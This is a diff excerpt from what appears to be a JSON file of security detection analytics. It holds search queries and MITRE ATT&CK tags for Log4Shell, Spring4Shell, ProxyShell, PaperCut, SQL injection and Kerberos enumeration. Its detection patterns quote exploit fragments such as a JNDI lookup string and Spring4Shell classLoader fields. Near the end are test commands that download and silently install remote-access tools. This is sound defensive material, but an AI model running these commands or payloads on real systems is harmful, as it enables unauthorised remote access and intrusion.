Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1133", + "mitre_attack_technique": "External Remote Services", + "mitre_attack_tactics": [ + "Initial Access", + "Persistence" + ], + "mitre_attack_groups": [ + "APT18", + "APT28", + "APT29", + "APT41", + "Chimera", + "Dragonfly", + "FIN5", + "GALLIUM", + "GOLD SOUTHFIELD", + "Ke3chang", + "Kimsuky", + "LAPSUS$", + "Leviathan", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Wizard Spider" + ] + } + ] + } + }, + { + "name": "Log4Shell JNDI Payload Injection with Outbound Connection", + "description": "CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we match the invocation function with a network connection to a malicious ip address.", + "search": "| from datamodel Web.Web | rex field=_raw max_match=0 \"[jJnNdDiI]{4}(\\:|\\%3A|\\/|\\%2F)(?\\w+)(\\:\\/\\/|\\%3A\\%2F\\%2F)(\\$\\{.*?\\}(\\.)?)?(?[a-zA-Z0-9\\.\\-\\_\\$]+)\" | join affected_host type=inner [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic by All_Traffic.dest | `drop_dm_object_name(All_Traffic)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename dest AS affected_host] | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_with_outbound_connection_filter`", + "tags": { + "name": "Log4Shell JNDI Payload Injection with Outbound Connection", + "analytic_story": [ + "Log4Shell CVE-2021-44228", + "CISA AA22-320A" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Delivery", + "Installation" + ], + "message": "CVE-2021-44228 Log4Shell triggered for host $dest$", + "mitre_attack_id": [ + "T1190", + "T1133" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 15, + "security_domain": "threat", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1133", + "mitre_attack_technique": "External Remote Services", + "mitre_attack_tactics": [ + "Initial Access", + "Persistence" + ], + "mitre_attack_groups": [ + "APT18", + "APT28", + "APT29", + "APT41", + "Chimera", + "Dragonfly", + "FIN5", + "GALLIUM", + "GOLD SOUTHFIELD", + "Ke3chang", + "Kimsuky", + "LAPSUS$", + "Leviathan", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Wizard Spider" + ] + } + ] + } + }, + { + "name": "PaperCut NG Remote Web Access Attempt", + "description": "The following analytic is designed to detect potential exploitation attempts on publicly accessible PaperCut NG servers. It identifies connections from public IP addresses to the server and specifically monitors for URI paths commonly found in proof-of-concept (POC) scripts for exploiting PaperCut NG vulnerabilities. These URI paths have been observed in both Metasploit modules and standalone scripts used for attacking PaperCut NG servers. When a public IP address is detected accessing one or more of these suspicious URI paths, an alert may be generated to notify the security team of the potential threat. The team can then investigate the source IP address, the targeted PaperCut NG server, and any other relevant information to determine the nature of the activity and take appropriate actions to mitigate the risk.", + "search": "| tstats count from datamodel=Web where Web.url IN (\"/app?service=page/SetupCompleted\", \"/app\", \"/app?service=page/PrinterList\", \"/app?service=direct/1/PrinterList/selectPrinter&sp=*\", \"/app?service=direct/1/PrinterDetails/printerOptionsTab.tab\") NOT (src IN (\"10.*.*.*\",\"172.16.*.*\", \"192.168.*.*\", \"169.254.*.*\", \"127.*.*.*\", \"fc00::*\", \"fd00::*\", \"fe80::*\")) by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest Web.dest_port sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `papercut_ng_remote_web_access_attempt_filter`", + "tags": { + "name": "PaperCut NG Remote Web Access Attempt", + "analytic_story": [ + "PaperCut MF NG Vulnerability" + ], + "asset_type": "Web Server", + "cis20": [ + "CIS 13" + ], + "kill_chain_phases": [ + "Delivery", + "Installation" + ], + "message": "URIs specific to PaperCut NG have been access by a public IP against $dest$.", + "mitre_attack_id": [ + "T1190", + "T1133" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 63, + "security_domain": "network", + "risk_severity": "medium", + "atomic_guid": [], + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1133", + "mitre_attack_technique": "External Remote Services", + "mitre_attack_tactics": [ + "Initial Access", + "Persistence" + ], + "mitre_attack_groups": [ + "APT18", + "APT28", + "APT29", + "APT41", + "Chimera", + "Dragonfly", + "FIN5", + "GALLIUM", + "GOLD SOUTHFIELD", + "Ke3chang", + "Kimsuky", + "LAPSUS$", + "Leviathan", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Wizard Spider" + ] + } + ] + } + }, + { + "name": "ProxyShell ProxyNotShell Behavior Detected", + "description": "The following correlation will identify activity related to Windows Exchange being actively exploited by adversaries related to ProxyShell or ProxyNotShell. In addition, the analytic correlates post-exploitation Cobalt Strike analytic story. Common post-exploitation behavior has been seen in the wild includes adversaries running nltest, Cobalt Strike, Mimikatz and adding a new user. The correlation specifically looks for 5 distinct analyticstories to trigger. Modify or tune as needed for your organization. 5 analytics is an arbitrary number but was chosen to reduce the amount of noise but also require the 2 analytic stories or a ProxyShell and CobaltStrike to fire. Adversaries will exploit the vulnerable Exchange server, abuse SSRF, drop a web shell, utilize the PowerShell Exchange modules and begin post-exploitation.", + "search": "| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.analyticstories) as analyticstories values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count dc(All_Risk.analyticstories) as dc_analyticstories from datamodel=Risk.All_Risk where All_Risk.analyticstories IN (\"ProxyNotShell\",\"ProxyShell\") OR (All_Risk.analyticstories IN (\"ProxyNotShell\",\"ProxyShell\") AND All_Risk.analyticstories=\"Cobalt Strike\") All_Risk.risk_object_type=\"system\" by _time span=1h All_Risk.risk_object All_Risk.risk_object_type | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| where source_count >=5 | `proxyshell_proxynotshell_behavior_detected_filter`", + "tags": { + "name": "ProxyShell ProxyNotShell Behavior Detected", + "analytic_story": [ + "ProxyShell", + "BlackByte Ransomware", + "ProxyNotShell" + ], + "asset_type": "Web Server", + "cis20": [ + "CIS 13" + ], + "kill_chain_phases": [ + "Delivery", + "Installation" + ], + "message": "ProxyShell or ProxyNotShell activity has been identified on $risk_object$.", + "mitre_attack_id": [ + "T1190", + "T1133" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "risk_object", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 81, + "security_domain": "network", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1133", + "mitre_attack_technique": "External Remote Services", + "mitre_attack_tactics": [ + "Initial Access", + "Persistence" + ], + "mitre_attack_groups": [ + "APT18", + "APT28", + "APT29", + "APT41", + "Chimera", + "Dragonfly", + "FIN5", + "GALLIUM", + "GOLD SOUTHFIELD", + "Ke3chang", + "Kimsuky", + "LAPSUS$", + "Leviathan", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Wizard Spider" + ] + } + ] + } + }, + { + "name": "Spring4Shell Payload URL Request", + "description": "The following analytic is static indicators related to CVE-2022-22963, Spring4Shell. The 3 indicators provide an amount of fidelity that source IP is attemping to exploit a web shell on the destination. The filename and cmd are arbitrary in this exploitation. Java will write a JSP to disk and a process will spawn from Java based on the cmd passed. This is indicative of typical web shell activity.", + "search": "| tstats count from datamodel=Web where Web.http_method IN (\"GET\") Web.url IN (\"*tomcatwar.jsp*\",\"*poc.jsp*\",\"*shell.jsp*\") by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spring4shell_payload_url_request_filter`", + "tags": { + "name": "Spring4Shell Payload URL Request", + "analytic_story": [ + "Spring4Shell CVE-2022-22965" + ], + "asset_type": "Web Server", + "cis20": [ + "CIS 13" + ], + "kill_chain_phases": [ + "Installation", + "Delivery" + ], + "message": "A URL was requested related to Spring4Shell POC code on $dest$ by $src$.", + "mitre_attack_id": [ + "T1505.003", + "T1505", + "T1190", + "T1133" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "IP Address", + "role": [ + "Victim" + ] + }, + { + "name": "src", + "type": "IP Address", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 36, + "security_domain": "network", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1505.003", + "mitre_attack_technique": "Web Shell", + "mitre_attack_tactics": [ + "Persistence" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT32", + "APT38", + "APT39", + "BackdoorDiplomacy", + "Deep Panda", + "Dragonfly", + "Fox Kitten", + "GALLIUM", + "HAFNIUM", + "Kimsuky", + "Leviathan", + "Magic Hound", + "Moses Staff", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Volatile Cedar" + ] + }, + { + "mitre_attack_id": "T1505", + "mitre_attack_technique": "Server Software Component", + "mitre_attack_tactics": [ + "Persistence" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1133", + "mitre_attack_technique": "External Remote Services", + "mitre_attack_tactics": [ + "Initial Access", + "Persistence" + ], + "mitre_attack_groups": [ + "APT18", + "APT28", + "APT29", + "APT41", + "Chimera", + "Dragonfly", + "FIN5", + "GALLIUM", + "GOLD SOUTHFIELD", + "Ke3chang", + "Kimsuky", + "LAPSUS$", + "Leviathan", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Wizard Spider" + ] + } + ] + } + }, + { + "name": "SQL Injection with Long URLs", + "description": "This search looks for long URLs that have several SQL commands visible within them.", + "search": "| tstats `security_content_summariesonly` count from datamodel=Web where Web.dest_category=web_server AND (Web.url_length > 1024 OR Web.http_user_agent_length > 200) by Web.src Web.dest Web.url Web.url_length Web.http_user_agent | `drop_dm_object_name(\"Web\")` | eval url=lower(url) | eval num_sql_cmds=mvcount(split(url, \"alter%20table\")) + mvcount(split(url, \"between\")) + mvcount(split(url, \"create%20table\")) + mvcount(split(url, \"create%20database\")) + mvcount(split(url, \"create%20index\")) + mvcount(split(url, \"create%20view\")) + mvcount(split(url, \"delete\")) + mvcount(split(url, \"drop%20database\")) + mvcount(split(url, \"drop%20index\")) + mvcount(split(url, \"drop%20table\")) + mvcount(split(url, \"exists\")) + mvcount(split(url, \"exec\")) + mvcount(split(url, \"group%20by\")) + mvcount(split(url, \"having\")) + mvcount(split(url, \"insert%20into\")) + mvcount(split(url, \"inner%20join\")) + mvcount(split(url, \"left%20join\")) + mvcount(split(url, \"right%20join\")) + mvcount(split(url, \"full%20join\")) + mvcount(split(url, \"select\")) + mvcount(split(url, \"distinct\")) + mvcount(split(url, \"select%20top\")) + mvcount(split(url, \"union\")) + mvcount(split(url, \"xp_cmdshell\")) - 24 | where num_sql_cmds > 3 | `sql_injection_with_long_urls_filter`", + "tags": { + "name": "SQL Injection with Long URLs", + "analytic_story": [ + "SQL Injection" + ], + "asset_type": "Database Server", + "cis20": [ + "CIS 13" + ], + "kill_chain_phases": [ + "Delivery" + ], + "message": "SQL injection attempt with url $url$ detected on $dest$", + "mitre_attack_id": [ + "T1190" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "network", + "risk_severity": "low", "mitre_attack_enrichments": [ { "mitre_attack_id": "T1190", @@ -248179,7 +250906,7 @@ { "name": "Web Spring4Shell HTTP Request Class Module", "description": "The following analytic identifies the payload related to Spring4Shell, CVE-2022-22965. This analytic uses Splunk Stream HTTP to view the http request body, form data. STRT reviewed all the current proof of concept code and determined the commonality with the payloads being passed used the same fields \"class.module.classLoader.resources.context.parent.pipeline.first\".", - "search": "`stream_http` http_method IN (\"POST\") | stats values(form_data) as http_request_body min(_time) as firstTime max(_time) as lastTime count by http_method http_user_agent uri_path url bytes_in bytes_out | search http_request_body IN (\"*class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_*\", \"*class.module.classLoader.resources.context.parent.pipeline.first.pattern*\",\"*suffix=.jsp*\") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `web_spring4shell_http_request_class_module_filter`", + "search": "`stream_http` http_method IN (\"POST\") | stats values(form_data) as http_request_body min(_time) as firstTime max(_time) as lastTime count by src dest http_method http_user_agent uri_path url bytes_in bytes_out | search http_request_body IN (\"*class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_*\", \"*class.module.classLoader.resources.context.parent.pipeline.first.pattern*\",\"*suffix=.jsp*\") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `web_spring4shell_http_request_class_module_filter`", "tags": { "name": "Web Spring4Shell HTTP Request Class Module", "analytic_story": [ @@ -248755,7 +251482,7 @@ { "name": "Disabled Kerberos Pre-Authentication Discovery With Get-ADUser", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUser` commandlet with specific parameters. `Get-ADUser` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Get-ADUser` is used to query for domain users. With the appropiate parameters, Get-ADUser allows adversaries to discover domain accounts with Kerberos Pre Authentication disabled.\\ Red Teams and adversaries alike use may abuse Get-ADUSer to enumerate these accounts and attempt to crack their passwords offline.", - "search": " `powershell` EventCode=4104 (ScriptBlockText = \"*Get-ADUser*\" AND ScriptBlockText=\"*4194304*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `disabled_kerberos_pre_authentication_discovery_with_get_aduser_filter`", + "search": " `powershell` EventCode=4104 (ScriptBlockText = \"*Get-ADUser*\" AND ScriptBlockText=\"*4194304*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | `security_content_ctime(firstTime)` | `disabled_kerberos_pre_authentication_discovery_with_get_aduser_filter`", "tags": { "name": "Disabled Kerberos Pre-Authentication Discovery With Get-ADUser", "analytic_story": [ @@ -248811,7 +251538,7 @@ { "name": "Disabled Kerberos Pre-Authentication Discovery With PowerView", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` commandlet with specific parameters. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows Active Directory networks. As the name suggests, `Get-DomainUser` is used to identify domain users and combining it with `-PreauthNotRequired` allows adversaries to discover domain accounts with Kerberos Pre Authentication disabled.\\ Red Teams and adversaries alike use may leverage PowerView to enumerate these accounts and attempt to crack their passwords offline.", - "search": " `powershell` EventCode=4104 (ScriptBlockText = \"*Get-DomainUser*\" AND ScriptBlockText=\"*PreauthNotRequired*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `disabled_kerberos_pre_authentication_discovery_with_powerview_filter`", + "search": " `powershell` EventCode=4104 (ScriptBlockText = \"*Get-DomainUser*\" AND ScriptBlockText=\"*PreauthNotRequired*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | `security_content_ctime(firstTime)` | `disabled_kerberos_pre_authentication_discovery_with_powerview_filter`", "tags": { "name": "Disabled Kerberos Pre-Authentication Discovery With PowerView", "analytic_story": [ @@ -248929,7 +251656,7 @@ { "name": "Kerberos Pre-Authentication Flag Disabled in UserAccountControl", "description": "The following analytic leverages Windows Security Event 4738, `A user account was changed`, to identify a change performed on a domain user object that disables Kerberos Pre-Authentication. Disabling the Pre Authentication flag in the UserAccountControl property allows an adversary to easily perform a brute force attack against the user's password offline leveraging the ASP REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges.", - "search": " `wineventlog_security` EventCode=4738 MSADChangedAttributes=\"*Don't Require Preauth' - Enabled*\" | table EventCode, Account_Name, Security_ID, MSADChangedAttributes | `kerberos_pre_authentication_flag_disabled_in_useraccountcontrol_filter`", + "search": " `wineventlog_security` EventCode=4738 MSADChangedAttributes=\"*Don't Require Preauth' - Enabled*\" |rename Account_Name as user | table EventCode, user, dest, Security_ID, MSADChangedAttributes | `kerberos_pre_authentication_flag_disabled_in_useraccountcontrol_filter`", "tags": { "name": "Kerberos Pre-Authentication Flag Disabled in UserAccountControl", "analytic_story": [ @@ -248942,7 +251669,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Kerberos Pre Authentication was Disabled for $Account_Name$", + "message": "Kerberos Pre Authentication was Disabled for $user$", "mitre_attack_id": [ "T1558", "T1558.004" @@ -248952,8 +251679,8 @@ ], "observable": [ { - "name": "dest", - "type": "Endpoint", + "name": "user", + "type": "User Name", "role": [ "Victim" ] @@ -248985,7 +251712,7 @@ { "name": "Kerberos Pre-Authentication Flag Disabled with PowerShell", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Set-ADAccountControl` commandlet with specific parameters. `Set-ADAccountControl` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Set-ADAccountControl` is used to modify User Account Control values for an Active Directory domain account. With the appropiate parameters, Set-ADAccountControl allows adversaries to disable Kerberos Pre-Authentication for an account to to easily perform a brute force attack against the user's password offline leveraging the ASP REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges.", - "search": "`powershell` EventCode=4104 (ScriptBlockText = \"*Set-ADAccountControl*\" AND ScriptBlockText=\"*DoesNotRequirePreAuth:$true*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kerberos_pre_authentication_flag_disabled_with_powershell_filter`", + "search": "`powershell` EventCode=4104 (ScriptBlockText = \"*Set-ADAccountControl*\" AND ScriptBlockText=\"*DoesNotRequirePreAuth:$true*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kerberos_pre_authentication_flag_disabled_with_powershell_filter`", "tags": { "name": "Kerberos Pre-Authentication Flag Disabled with PowerShell", "analytic_story": [ @@ -249458,7 +252185,7 @@ { "name": "Windows PowerView Kerberos Service Ticket Request", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainSPNTicket` commandlets with specific parameters. This commandlet is a part of PowerView, a PowerShell tool used to perform enumeration and discovery on Windows Active Directory networks. As the name suggests, this commandlet is used to request the kerberos ticket for a specified service principal name (SPN). Once the ticket is received, it may be cracked using password cracking tools like hashcat to extract the password of the SPN account. Red Teams and adversaries alike may leverage PowerView and these commandlets to identify accounts that can be attacked with the Kerberoasting technique.", - "search": "`powershell` EventCode=4104 ScriptBlockText=*Get-DomainSPNTicket* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powerview_kerberos_service_ticket_request_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText=*Get-DomainSPNTicket* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powerview_kerberos_service_ticket_request_filter`", "tags": { "name": "Windows PowerView Kerberos Service Ticket Request", "analytic_story": [ @@ -249471,7 +252198,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "PowerView commandlets used for requesting SPN service ticket executed on $Computer$", + "message": "PowerView commandlets used for requesting SPN service ticket executed on $dest$", "mitre_attack_id": [ "T1558", "T1558.003" @@ -249481,8 +252208,8 @@ ], "observable": [ { - "name": "Client_Address", - "type": "Endpoint", + "name": "dest", + "type": "Hostname", "role": [ "Victim" ] @@ -249517,7 +252244,7 @@ { "name": "Windows PowerView SPN Discovery", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` or `Get-NetUSer` commandlets with specific parameters. These commandlets are part of PowerView, a PowerShell tool used to perform enumeration and discovery on Windows Active Directory networks. As the names suggest, these commandlets are used to identify domain users in a network and combining them with the `-SPN` parameter allows adversaries to discover domain accounts associated with a Service Principal Name (SPN). Red Teams and adversaries alike may leverage PowerView and these commandlets to identify accounts that can be attacked with the Kerberoasting technique.", - "search": "`powershell` EventCode=4104 (ScriptBlockText =*Get-NetUser* OR ScriptBlockText=*Get-DomainUser*) ScriptBlockText= *-SPN* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `windows_powerview_spn_discovery_filter`", + "search": "`powershell` EventCode=4104 (ScriptBlockText =*Get-NetUser* OR ScriptBlockText=*Get-DomainUser*) ScriptBlockText= *-SPN* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `windows_powerview_spn_discovery_filter`", "tags": { "name": "Windows PowerView SPN Discovery", "analytic_story": [ @@ -249530,7 +252257,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "PowerView commandlets used for SPN discovery executed on $Computer$", + "message": "PowerView commandlets used for SPN discovery executed on $dest$", "mitre_attack_id": [ "T1558", "T1558.003" @@ -249540,8 +252267,8 @@ ], "observable": [ { - "name": "Client_Address", - "type": "Endpoint", + "name": "dest", + "type": "Hostname", "role": [ "Victim" ] @@ -250319,7 +253046,8 @@ "3CX Supply Chain Attack", "AgentTesla", "RedLine Stealer", - "FIN7" + "FIN7", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -251915,9 +254643,9 @@ "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\LogMeInIgnition.msi\"\nStart-Process -Wait $file1 /quiet;\nStart-Process 'C:\\Program Files (x86)\\LogMeIn Ignition\\LMIIgnition.exe' \"/S\"\n", "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Downloads\\GoToAssist.exe \"https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1\"\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Downloads\\GoToAssist.exe\"\nStart-Process $file1 /S;\n", "$installer = \"C:\\Users\\$env:username\\Downloads\\ScreenConnect.msi\"\nInvoke-WebRequest -OutFile $installer \"https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi\"\nmsiexec /i $installer /qn\n", - "Start-Process \\..\\ExternalPayloads\\ammyy.exe\n", - "Start-Process \\..\\ExternalPayloads\\RemotePC.exe\n", - "Start-Process \\..\\ExternalPayloads\\T1219_NetSupport.exe -ArgumentList \"/S /v/qn\"\n", + "Start-Process \"\\..\\ExternalPayloads\\ammyy.exe\"\n", + "Start-Process \"\\..\\ExternalPayloads\\RemotePC.exe\"\n", + "Start-Process \"\\..\\ExternalPayloads\\T1219_NetSupport.exe\" -ArgumentList \"/S /v/qn\"\n", "Start-Process -Wait -FilePath \"\\..\\ExternalPayloads\\T1219_UltraViewer.exe\" -Argument \"/silent\" -PassThru\nStart-Process 'C:\\Program Files (x86)\\UltraViewer\\UltraViewer_Desktop.exe'\n", "Start-Process $env:ProgramFiles\\'uvnc bvba\\UltraVnc\\vncviewer.exe'\n", "Start-Process $env:ProgramFiles\\Connect\\Connect.exe\n", @@ -252068,7 +254796,7 @@ ], "executor": { "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Downloads\\GoToAssist.exe 